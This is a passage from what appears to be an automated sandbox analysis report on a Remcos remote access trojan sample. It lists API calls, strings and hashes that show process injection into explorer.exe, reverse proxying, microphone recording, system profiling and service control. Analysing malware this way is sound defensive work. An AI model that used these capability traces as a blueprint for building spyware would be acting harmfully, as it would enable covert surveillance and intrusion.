                                                          • GetLocalTime.KERNEL32(?), ref: 00419472
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041955B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$VG$VG
                                                          • API String ID: 489098229-455837001
                                                          • Opcode ID: 500acf9a494ada26150f229ae3ebd5d047cc9a7eea70b6fe6913e98e6c89e00a
                                                          • Instruction ID: fd6a6a94d4e700b4a78141c9ee43bb9ee9cebd21b8d39b126fa21a823fd8be24
                                                          • Opcode Fuzzy Hash: 500acf9a494ada26150f229ae3ebd5d047cc9a7eea70b6fe6913e98e6c89e00a
                                                          • Instruction Fuzzy Hash: 9F517B71A002449ACB14BBB5C866AFE7BA9AB55308F40403FF845B71D2EF3C5E85C799
                                                          Function 00413D3F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: ca54308d78d3c4eee7f7b8de95e44a5f1974b5ba6ce0b2e83d9cd08af329ba0f
                                                          • Instruction ID: c3bfc2202edcb816331f8b78e042012e01f064b481147a6b300cfea58c86e196
                                                          • Opcode Fuzzy Hash: ca54308d78d3c4eee7f7b8de95e44a5f1974b5ba6ce0b2e83d9cd08af329ba0f
                                                          • Instruction Fuzzy Hash: E241F4716093029BD7209F28D905BBB3BA4EB84742F04042FF98593391EB6DDEC1866E
                                                          Function 0041700D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 107filesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00466554), ref: 0041710A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00417113
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417122
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004170D6
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                          • String ID: <$@$HVG$HVG$TeF$Temp
                                                          • API String ID: 1107811701-3258348784
                                                          • Opcode ID: d902a6d54ce373eeaba4fe26e471b4facccc04bacbce4bf5cb3c6a9bc09dc6e7
                                                          • Instruction ID: 91e4b2e714ed18abe86730f534b33d619c8c8851ecafca63038a632c75497fc1
                                                          • Opcode Fuzzy Hash: d902a6d54ce373eeaba4fe26e471b4facccc04bacbce4bf5cb3c6a9bc09dc6e7
                                                          • Instruction Fuzzy Hash: 00319C31A00209ABCB04FBA1DC56AEE7775AF50308F40417EF506761E2EF785A89CB99
                                                          Function 00439571 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395C9
                                                          • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395D6
                                                          • __dosmaperr.LIBCMT ref: 004395DD
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439609
                                                          • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439613
                                                          • __dosmaperr.LIBCMT ref: 0043961A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043965D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439667
                                                          • __dosmaperr.LIBCMT ref: 0043966E
                                                          • _free.LIBCMT ref: 0043967A
                                                          • _free.LIBCMT ref: 00439681
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: 7d25b48f924a9fae5a5881453bd469cfe57fd0c2e6412707544dbbd620f0408d
                                                          • Instruction ID: 4e2bc3e06b1619faa1414a7a2c806c5d1514cda6e297fdc8b1054bbcfea92265
                                                          • Opcode Fuzzy Hash: 7d25b48f924a9fae5a5881453bd469cfe57fd0c2e6412707544dbbd620f0408d
                                                          • Instruction Fuzzy Hash: D431E27280560ABFDF11AFA5DC459AF3B68EF09324F10015EF81066251DB39CD50DBAA
                                                          Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                          • TranslateMessage.USER32(?), ref: 00404F30
                                                          • DispatchMessageA.USER32(?), ref: 00404F3B
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00404FF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 96316b140588b7c4ada28055f90010ccda92cd34d6d0a69490f2829ee7134a41
                                                          • Instruction ID: 290a0909c372499a911e5ffd519e5407deecd3e64339803c74491ead196e324c
                                                          • Opcode Fuzzy Hash: 96316b140588b7c4ada28055f90010ccda92cd34d6d0a69490f2829ee7134a41
                                                          • Instruction Fuzzy Hash: A441B1726043016BC614FB75DC568AF7BA8ABC1714F00093EF906A31E6EF38DA05C79A
                                                          Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00475A50,00000000,004752F0,00003000,00000004,00000000,00000001), ref: 00406647
                                                          • GetCurrentProcess.KERNEL32(00475A50,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe), ref: 00406705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$peF$windir
                                                          • API String ID: 2050909247-369753874
                                                          • Opcode ID: 3d4dde61fac8f932cecf13147f1715ad91c8a5d9075df555c2e0fc840e87cdfb
                                                          • Instruction ID: 2a8ac338152687dbadce55b3d6de3572d7837fd421bef744f3a625c24d449dc1
                                                          • Opcode Fuzzy Hash: 3d4dde61fac8f932cecf13147f1715ad91c8a5d9075df555c2e0fc840e87cdfb
                                                          • Instruction Fuzzy Hash: B231B671600700AFD300AF65DC8AF5677A8FB44709F11053EF50ABB6E1EBB9A8548B6D
                                                          Function 00419E7B Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419E8A
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EA1
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EAE
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EBD
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ECE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ED1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: d8ee8a8803e7433114f97b69310c3a8ddf5ffb6cd74ebe626055e8ac32cb8db8
                                                          • Instruction ID: 401ec45fa9dd23e1a78cca63bf6ad54db5d4c9b9326c405a7ffc92fc58cb3c60
                                                          • Opcode Fuzzy Hash: d8ee8a8803e7433114f97b69310c3a8ddf5ffb6cd74ebe626055e8ac32cb8db8
                                                          • Instruction Fuzzy Hash: 4211A331941218BBD711AB64DC85DFF3B6CDB45BA1B05002AF902A21D2DF64CD4A9AB5
                                                          Function 00446FDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00446FEF
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00446FFB
                                                          • _free.LIBCMT ref: 00447006
                                                          • _free.LIBCMT ref: 00447011
                                                          • _free.LIBCMT ref: 0044701C
                                                          • _free.LIBCMT ref: 00447027
                                                          • _free.LIBCMT ref: 00447032
                                                          • _free.LIBCMT ref: 0044703D
                                                          • _free.LIBCMT ref: 00447048
                                                          • _free.LIBCMT ref: 00447056
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                          • Instruction ID: 9fec27c2adf71536e74eabd4120179072dbaa777ef3671cded9c13d0800a1e4b
                                                          • Opcode Fuzzy Hash: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                          • Instruction Fuzzy Hash: 86119B7550011CBFDB05EF55C882CDD3BB5EF05364B9240AAF9494F222DA35DE50EB49
                                                          Function 0041BA2F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041BA51
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041BA95
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041BD5F
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041BA47
                                                          • DisplayName, xrefs: 0041BADC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 1332880857-3614651759
                                                          • Opcode ID: 403d69b7d6150682721d806f011c6d0cce43ad32a20d27b465eebd232eb4432d
                                                          • Instruction ID: 1bcbf0a3cc417a03c0c35e29071d92a42b6db1fb54f2f7a4c144fc0fa0a0a3c2
                                                          • Opcode Fuzzy Hash: 403d69b7d6150682721d806f011c6d0cce43ad32a20d27b465eebd232eb4432d
                                                          • Instruction Fuzzy Hash: 43813F311082409FD324EB11D951AEFB7E8FFD4314F10493FB586921E1EF34AA59CA9A
                                                          Function 004103EC Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                          • API String ID: 3578746661-3604713145
                                                          • Opcode ID: 755815a8590020fe67a5e007faf453d0433b6e07d610cf032f2efe3dd928df76
                                                          • Instruction ID: 73c74054356758d85ec5353b0407031f458931cc5dd6312d5a4dd957febfbb04
                                                          • Opcode Fuzzy Hash: 755815a8590020fe67a5e007faf453d0433b6e07d610cf032f2efe3dd928df76
                                                          • Instruction Fuzzy Hash: 5851A4316043005BCA14FB75D95AAAE36A59B84318F00453FF809972E1DFBC9D85C78E
                                                          Function 004167E2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416842
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • Sleep.KERNEL32(00000064), ref: 0041686E
                                                          • DeleteFileW.KERNEL32(00000000), ref: 004168A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 30589525983727894ad073842d04d74b43d138f664415db5492ece07a2d42c30
                                                          • Instruction ID: c4be9e9118a59201799f54b99a9a171b680bb642a7e99c3b30ff6139130205e5
                                                          • Opcode Fuzzy Hash: 30589525983727894ad073842d04d74b43d138f664415db5492ece07a2d42c30
                                                          • Instruction Fuzzy Hash: 1B313E719001189ADB04FBA1DC96EEE7764AF50708F00417FF946730D2EF786A8ACA9D
                                                          Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401AD3
                                                            • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • waveInUnprepareHeader.WINMM(00472AC0,00000020,00000000,?), ref: 00401B85
                                                          • waveInPrepareHeader.WINMM(00472AC0,00000020), ref: 00401BC3
                                                          • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401BD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                          • API String ID: 3809562944-243156785
                                                          • Opcode ID: 8bc7c709b81e80b1cd26a8133e5bfa918e3c280da4f8c48c3ca11c29a62aef04
                                                          • Instruction ID: b0e15ff03f11dcb3e5bfd7c1448581b7ace3962aa9bffbd159c0990beee9d81b
                                                          • Opcode Fuzzy Hash: 8bc7c709b81e80b1cd26a8133e5bfa918e3c280da4f8c48c3ca11c29a62aef04
                                                          • Instruction Fuzzy Hash: 7E315E315043019FC324EB21DC56A9E77A4FB94314F00493EF559A21F1EFB8AA89CB9A
                                                          Function 0041CB7A Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041CB93
                                                            • Part of subcall function 0041CC2A: RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                            • Part of subcall function 0041CC2A: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                            • Part of subcall function 0041CC2A: GetLastError.KERNEL32 ref: 0041CC9C
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041CBCA
                                                          • lstrcpynA.KERNEL32(00474B68,Remcos,00000080), ref: 0041CBE4
                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B50), ref: 0041CBFA
                                                          • TranslateMessage.USER32(?), ref: 0041CC06
                                                          • DispatchMessageA.USER32(?), ref: 0041CC10
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CC1D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                          • Instruction ID: 6591afd7fea275f101bd811abb8745f55115b26a2df550b070e187602390ba30
                                                          • Opcode Fuzzy Hash: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                          • Instruction Fuzzy Hash: 130112B1940344ABD7109BA5EC4DFEABBBCA7C5B05F004029E615A2061EFB8E585CB6D
                                                          Function 0044B660 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
